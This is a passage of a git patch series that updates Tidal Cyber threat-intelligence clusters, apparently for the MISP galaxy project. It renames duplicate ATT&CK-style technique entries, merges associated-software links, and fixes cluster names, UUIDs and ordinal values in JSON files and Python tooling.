payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", @@ -8814,7 +8814,7 @@ } ], "uuid": "350c12a3-33f6-5942-8892-4d6e70abbfc1", - "value": "Spearphishing Voice" + "value": "Spearphishing Voice - Duplicate" }, { "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)][[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)] Another way to accomplish this is by forging or spoofing[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)] the identity of the sender which can be used to fool both the human recipient as well as automated security tools.[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)] \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)][[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)] or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872)).[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]", @@ -12321,7 +12321,7 @@ } ], "uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", - "value": "Cloud Accounts" + "value": "Cloud Account - Duplicate" }, { "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.[[Microsoft Local Accounts Feb 2019](https://app.tidalcyber.com/references/6ae7487c-cb61-4f10-825f-4ef9ef050b7c)][[AWS Root User](https://app.tidalcyber.com/references/5f315c21-f02f-4c9e-aac6-d648deff3ff9)][[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) or credential materials to legitimately connect to remote environments via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1).[[Metasploit SSH Module](https://app.tidalcyber.com/references/e4ae69e5-67ba-4a3e-8101-5e7f073bd312)]", diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 858e50f..d27b63e 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -415,6 +415,59 @@ class TechniqueCluster(Cluster): uuid=sub_technique.get("id"), value=sub_technique.get("name"), ) + + # Code for handling duplicate from Tidal API data (hopefully only temporary) + if sub_value.uuid == "be637d66-5110-4872-bc15-63b062c3f290": + sub_value.value = "Botnet - Duplicate" + elif sub_value.uuid == "5c6c3492-5dbc-43ee-a3f2-ba1976d3b379": + sub_value.value = "DNS - Duplicate" + elif sub_value.uuid == "83e4f633-67fb-4d87-b1b3-8a7a2e60778b": + sub_value.value = "DNS Server - Duplicate" + elif sub_value.uuid == "b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d": + sub_value.value = "Domains - Duplicate" + elif sub_value.uuid == "6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2": + sub_value.value = "Server - Duplicate" + elif sub_value.uuid == "c30faf84-496b-4f27-a4bc-aa36d583c69f": + sub_value.value = "Serverless - Duplicate" + elif sub_value.uuid == "2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23": + sub_value.value = "Virtual Private Server - Duplicate" + elif sub_value.uuid == "2e883e0d-1108-431a-a2dd-98ba98b69417": + sub_value.value = "Web Services - Duplicate" + elif sub_value.uuid == "4b187604-88ab-4972-9836-90a04c705e10": + sub_value.value = "Cloud Account - Duplicate" + elif sub_value.uuid == "12908bde-a5eb-40a5-ae27-d93960d0bfdc": + sub_value.value = "Domain Account - Duplicate" + elif sub_value.uuid == "df5f6835-ca0a-4ef5-bb3a-b011e4025545": + sub_value.value = "Local Account - Duplicate" + elif sub_value.uuid == "3c4a2f3a-5877-4a27-a417-76318523657e": + sub_value.value = "Cloud Account - Duplicate" + elif sub_value.uuid == "4b187604-88ab-4972-9836-90a04c705e10": + sub_value.value = "Cloud Account - Duplicate2" + elif sub_value.uuid == "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6": + sub_value.value = "Email Accounts - Duplicate" + elif sub_value.uuid == "3426077d-3b9c-4f77-a1c6-d68f0dea670e": + sub_value.value = "Social Media Accounts - Duplicate" + elif sub_value.uuid == "fe595943-f264-4d05-a8c7-7afc8985bfc3": + sub_value.value = "Code Repositories - Duplicate" + elif sub_value.uuid == "2735f8d1-0e46-4cd7-bfbb-78941bb266fd": + sub_value.value = "Steganography - Duplicate" + elif sub_value.uuid == "6f152555-36a5-4ec9-8b9b-f0b32c3ccef8": + sub_value.value = "Code Signing Certificates - Duplicate" + elif sub_value.uuid == "5bcbb0c5-7061-481f-a677-09028a6c59f7": + sub_value.value = "Digital Certificates - Duplicate" + elif sub_value.uuid == "4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58": + sub_value.value = "Digital Certificates - Duplicate2" + elif sub_value.uuid == "5a57d258-0b23-431b-b50e-3150d2c0e52c": + sub_value.value = "Exploits - Duplicate" + elif sub_value.uuid == "0f77a14a-d450-4885-b81f-23eeffa53a7e": + sub_value.value = "Malware - Duplicate" + elif sub_value.uuid == "ba553ad4-5699-4458-ae4e-76e1faa43291": + sub_value.value = "Spearphishing Attachment - Duplicate" + elif sub_value.uuid == "d08a9977-9fc2-46bb-84f9-dbb5187c426d": + sub_value.value = "Spearphishing Link - Duplicate" + elif sub_value.uuid == "350c12a3-33f6-5942-8892-4d6e70abbfc1": + sub_value.value = "Spearphishing Voice - Duplicate" + self.values.append(sub_value.return_value()) related.append( { From 03c6e3cb00739f10081cfa6d846d8de7317b0d11 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 17:22:03 +0100 Subject: [PATCH 45/49] Fix [duplicates] list --- clusters/tidal-technique.json | 6 +++--- tools/tidal-api/models/cluster.py | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/clusters/tidal-technique.json b/clusters/tidal-technique.json index 3028e66..60f2413 100644 --- a/clusters/tidal-technique.json +++ b/clusters/tidal-technique.json @@ -321,7 +321,7 @@ } ], "uuid": "d76c3dde-dba5-4748-8d51-c93fc34f885e", - "value": "Cloud Account" + "value": "Cloud Account - Duplicate" }, { "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as net user /domain and net group /domain of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups. ", @@ -2215,7 +2215,7 @@ } ], "uuid": "4b187604-88ab-4972-9836-90a04c705e10", - "value": "Cloud Account - Duplicate" + "value": "Cloud Accounts - Duplicate2" }, { "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)][[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)] Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", @@ -12321,7 +12321,7 @@ } ], "uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", - "value": "Cloud Account - Duplicate" + "value": "Cloud Accounts - Duplicate" }, { "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.[[Microsoft Local Accounts Feb 2019](https://app.tidalcyber.com/references/6ae7487c-cb61-4f10-825f-4ef9ef050b7c)][[AWS Root User](https://app.tidalcyber.com/references/5f315c21-f02f-4c9e-aac6-d648deff3ff9)][[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) or credential materials to legitimately connect to remote environments via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1).[[Metasploit SSH Module](https://app.tidalcyber.com/references/e4ae69e5-67ba-4a3e-8101-5e7f073bd312)]", diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index d27b63e..b793bed 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -433,16 +433,16 @@ class TechniqueCluster(Cluster): sub_value.value = "Virtual Private Server - Duplicate" elif sub_value.uuid == "2e883e0d-1108-431a-a2dd-98ba98b69417": sub_value.value = "Web Services - Duplicate" - elif sub_value.uuid == "4b187604-88ab-4972-9836-90a04c705e10": + elif sub_value.uuid == "d76c3dde-dba5-4748-8d51-c93fc34f885e": sub_value.value = "Cloud Account - Duplicate" elif sub_value.uuid == "12908bde-a5eb-40a5-ae27-d93960d0bfdc": sub_value.value = "Domain Account - Duplicate" elif sub_value.uuid == "df5f6835-ca0a-4ef5-bb3a-b011e4025545": sub_value.value = "Local Account - Duplicate" elif sub_value.uuid == "3c4a2f3a-5877-4a27-a417-76318523657e": - sub_value.value = "Cloud Account - Duplicate" + sub_value.value = "Cloud Accounts - Duplicate" elif sub_value.uuid == "4b187604-88ab-4972-9836-90a04c705e10": - sub_value.value = "Cloud Account - Duplicate2" + sub_value.value = "Cloud Accounts - Duplicate2" elif sub_value.uuid == "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6": sub_value.value = "Email Accounts - Duplicate" elif sub_value.uuid == "3426077d-3b9c-4f77-a1c6-d68f0dea670e": From c28a001b4f18b50f183af7434cabfa3916122a72 Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 6 Mar 2024 09:19:11 +0100 Subject: [PATCH 46/49] Fix [tidal] check for existing sub clusters --- clusters/tidal-software.json | 22 ++++------------------ tools/tidal-api/models/cluster.py | 26 ++++++++++++++++++++++++++ 2 files changed, 30 insertions(+), 18 deletions(-) diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json index e68ae49..a5dc88e 100644 --- a/clusters/tidal-software.json +++ b/clusters/tidal-software.json @@ -22752,6 +22752,10 @@ { "dest-uuid": "a4700431-6578-489f-9782-52e394277296", "type": "similar" + }, + { + "dest-uuid": "49d0ae81-d51b-4534-b1e0-08371a47ef79", + "type": "similar" } ], "uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", @@ -30905,20 +30909,6 @@ "uuid": "2143f749-d7b8-43c0-8041-8aeb486142c2", "value": "TestWindowRemoteAgent" }, - { - "description": "Based on similar descriptions of functionality, it appears S0146, as named by FireEye, is the same as Stage 4 of a backdoor named DNSMessenger by Cisco's Talos Intelligence Group. However, FireEye appears to break DNSMessenger into two parts: S0145 and S0146. [[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)] [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]", - "meta": { - "id": "1b0ec06d-0748-42ea-912f-e23f14d94b95" - }, - "related": [ - { - "dest-uuid": "49d0ae81-d51b-4534-b1e0-08371a47ef79", - "type": "similar" - } - ], - "uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", - "value": "DNSMessenger - Associated Software" - }, { "description": "[TEXTMATE](https://app.tidalcyber.com/software/49d0ae81-d51b-4534-b1e0-08371a47ef79) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) in February 2017. [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]", "meta": { @@ -30942,10 +30932,6 @@ { "dest-uuid": "4f6aa78c-c3d4-4883-9840-96ca2f5d6d47", "type": "similar" - }, - { - "dest-uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", - "type": "similar" } ], "uuid": "49d0ae81-d51b-4534-b1e0-08371a47ef79", diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index b793bed..df22826 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -221,6 +221,19 @@ class GroupCluster(Cluster): ) if self.subs: for associated_group in entry.get("associated_groups"): + found = False + for x in self.values: + if associated_group.get("associated_group_id") == x.get("uuid"): + x["related"].append( + { + "dest-uuid": entry.get("id"), + "type": "similar", + } + ) + found = True + break + if found: + continue associated_meta = AssociatedGroupsMeta( id=associated_group.get("id"), owner_id=associated_group.get("owner_id"), @@ -322,6 +335,19 @@ class SoftwareCluster(Cluster): ) if self.subs: for associated_software in entry.get("associated_software"): + found = False + for x in self.values: + if associated_software.get("associated_software_id") == x.get("uuid"): + x["related"].append( + { + "dest-uuid": entry.get("id"), + "type": "similar", + } + ) + found = True + break + if found: + continue associated_meta = AssociatedSoftwareMeta( id=associated_software.get("id"), owner_id=associated_software.get("owner_id"), From 4f07fbdcddb7473577c95e31e5aa22f79b8b4302 Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 6 Mar 2024 09:35:35 +0100 Subject: [PATCH 47/49] Fix [config] typo --- clusters/tidal-groups.json | 4 ++-- tools/tidal-api/config/groups.json | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json index 346f911..1c292dc 100644 --- a/clusters/tidal-groups.json +++ b/clusters/tidal-groups.json @@ -3,8 +3,8 @@ "Tidal Cyber" ], "category": "Threat Groups", - "description": "Tidal Threat Groups Cluster", - "name": "Tidal Threat Groups", + "description": "Tidal Groups Galaxy", + "name": "Tidal Groups", "source": "https://app-api.tidalcyber.com/api/v1/groups/", "type": "groups", "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", diff --git a/tools/tidal-api/config/groups.json b/tools/tidal-api/config/groups.json index 14419ee..f54a60c 100644 --- a/tools/tidal-api/config/groups.json +++ b/tools/tidal-api/config/groups.json @@ -12,8 +12,8 @@ "Tidal Cyber" ], "category": "Threat Groups", - "description": "Tidal Threat Groups Cluster", - "name": "Tidal Threat Groups", + "description": "Tidal Groups Galaxy", + "name": "Tidal Groups", "source": "https://app-api.tidalcyber.com/api/v1/groups/", "type": "groups" } From 098f0e6ecd7dd18c9b9b7f61673076a5a9931039 Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 6 Mar 2024 09:54:06 +0100 Subject: [PATCH 48/49] Fix [config] uuids --- clusters/tidal-campaigns.json | 2 +- clusters/tidal-groups.json | 2 +- clusters/tidal-references.json | 2 +- clusters/tidal-software.json | 2 +- clusters/tidal-tactic.json | 30 +++++++++++++------------- clusters/tidal-technique.json | 2 +- tools/tidal-api/config/campaigns.json | 2 +- tools/tidal-api/config/groups.json | 2 +- tools/tidal-api/config/references.json | 2 +- tools/tidal-api/config/software.json | 2 +- tools/tidal-api/config/tactic.json | 2 +- tools/tidal-api/config/technique.json | 2 +- tools/tidal-api/models/cluster.py | 4 ++-- 13 files changed, 28 insertions(+), 28 deletions(-) diff --git a/clusters/tidal-campaigns.json b/clusters/tidal-campaigns.json index 0c0636d..0b3910f 100644 --- a/clusters/tidal-campaigns.json +++ b/clusters/tidal-campaigns.json @@ -7,7 +7,7 @@ "name": "Tidal Campaigns", "source": "https://app-api.tidalcyber.com/api/v1/campaigns/", "type": "campaigns", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "3db4b6cb-5b89-4096-a057-e0205777adc9", "values": [ { "description": "[2015 Ukraine Electric Power Attack](https://app.tidalcyber.com/campaigns/96e367d0-a744-5b63-85ec-595f505248a3) was a [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) campaign during which they used [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) (specifically BlackEnergy3) and [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) to target and disrupt transmission and distribution substations within the Ukrainian power grid. This campaign was the first major public attack conducted against the Ukrainian power grid by Sandworm Team.", diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json index 1c292dc..4b923a9 100644 --- a/clusters/tidal-groups.json +++ b/clusters/tidal-groups.json @@ -7,7 +7,7 @@ "name": "Tidal Groups", "source": "https://app-api.tidalcyber.com/api/v1/groups/", "type": "groups", - "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "uuid": "877cdc4b-3392-4353-a7d4-2e46d40e5936", "values": [ { "description": "[admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3), as well as some non-public backdoors. [[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]", diff --git a/clusters/tidal-references.json b/clusters/tidal-references.json index c6ec02f..35270ab 100644 --- a/clusters/tidal-references.json +++ b/clusters/tidal-references.json @@ -7,7 +7,7 @@ "name": "Tidal References", "source": "https://app-api.tidalcyber.com/api/v1/references/", "type": "references", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "efd98ec4-16ef-41c4-bc3c-60c7c1ae8b39", "values": [ { "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.", diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json index a5dc88e..bfacd01 100644 --- a/clusters/tidal-software.json +++ b/clusters/tidal-software.json @@ -7,7 +7,7 @@ "name": "Tidal Software", "source": "https://app-api.tidalcyber.com/api/v1/software/", "type": "software", - "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "uuid": "6eb44da4-ed4f-4a5d-a444-0f105ff1b3c2", "values": [ { "description": "[3PARA RAT](https://app.tidalcyber.com/software/71d76208-c465-4447-8d6e-c54f142b65a4) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). [[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", diff --git a/clusters/tidal-tactic.json b/clusters/tidal-tactic.json index 3432967..b24c5fd 100644 --- a/clusters/tidal-tactic.json +++ b/clusters/tidal-tactic.json @@ -7,12 +7,12 @@ "name": "Tidal Tactic", "source": "https://app-api.tidalcyber.com/api/v1/tactic/", "type": "tactic", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "16b963e7-4b88-44e0-b184-16bf9e71fdc9", "values": [ { "description": "The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.", "meta": { - "ordinal_position": 1, + "ordinal_position": "1", "source": "MITRE", "tactic_attack_id": "TA0043" }, @@ -200,7 +200,7 @@ { "description": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.", "meta": { - "ordinal_position": 2, + "ordinal_position": "2", "source": "MITRE", "tactic_attack_id": "TA0042" }, @@ -392,7 +392,7 @@ { "description": "The adversary is trying to get into your network.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.", "meta": { - "ordinal_position": 3, + "ordinal_position": "3", "source": "MITRE", "tactic_attack_id": "TA0001" }, @@ -488,7 +488,7 @@ { "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. ", "meta": { - "ordinal_position": 4, + "ordinal_position": "4", "source": "MITRE", "tactic_attack_id": "TA0002" }, @@ -644,7 +644,7 @@ { "description": "The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. ", "meta": { - "ordinal_position": 5, + "ordinal_position": "5", "source": "MITRE", "tactic_attack_id": "TA0003" }, @@ -1116,7 +1116,7 @@ { "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ", "meta": { - "ordinal_position": 6, + "ordinal_position": "6", "source": "MITRE", "tactic_attack_id": "TA0004" }, @@ -1544,7 +1544,7 @@ { "description": "The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. ", "meta": { - "ordinal_position": 7, + "ordinal_position": "7", "source": "MITRE", "tactic_attack_id": "TA0005" }, @@ -2320,7 +2320,7 @@ { "description": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.", "meta": { - "ordinal_position": 8, + "ordinal_position": "8", "source": "MITRE", "tactic_attack_id": "TA0006" }, @@ -2588,7 +2588,7 @@ { "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective. ", "meta": { - "ordinal_position": 9, + "ordinal_position": "9", "source": "MITRE", "tactic_attack_id": "TA0007" }, @@ -2784,7 +2784,7 @@ { "description": "The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. ", "meta": { - "ordinal_position": 10, + "ordinal_position": "10", "source": "MITRE", "tactic_attack_id": "TA0008" }, @@ -2888,7 +2888,7 @@ { "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.", "meta": { - "ordinal_position": 11, + "ordinal_position": "11", "source": "MITRE", "tactic_attack_id": "TA0009" }, @@ -3048,7 +3048,7 @@ { "description": "The adversary is trying to communicate with compromised systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.", "meta": { - "ordinal_position": 12, + "ordinal_position": "12", "source": "MITRE", "tactic_attack_id": "TA0011" }, @@ -3220,7 +3220,7 @@ { "description": "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.", "meta": { - "ordinal_position": 13, + "ordinal_position": "13", "source": "MITRE", "tactic_attack_id": "TA0010" }, @@ -3308,7 +3308,7 @@ { "description": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.\n \nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.", "meta": { - "ordinal_position": 14, + "ordinal_position": "14", "source": "MITRE", "tactic_attack_id": "TA0040" }, diff --git a/clusters/tidal-technique.json b/clusters/tidal-technique.json index 60f2413..cf11914 100644 --- a/clusters/tidal-technique.json +++ b/clusters/tidal-technique.json @@ -7,7 +7,7 @@ "name": "Tidal Technique", "source": "https://app-api.tidalcyber.com/api/v1/technique/", "type": "technique", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "298b6aee-981b-4fd8-8759-a2e72ad223fa", "values": [ { "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[[TechNet How UAC Works](https://app.tidalcyber.com/references/bbf8d1a3-115e-4bc8-be43-47ce3b295d45)]\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) objects without prompting the user through the UAC notification box.[[TechNet Inside UAC](https://app.tidalcyber.com/references/dea47af6-677a-4625-8664-adf0e6839c9f)][[MSDN COM Elevation](https://app.tidalcyber.com/references/898df7c7-4f19-40cb-a216-7b0f6c6155b3)] An example of this is use of [Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to load a specifically 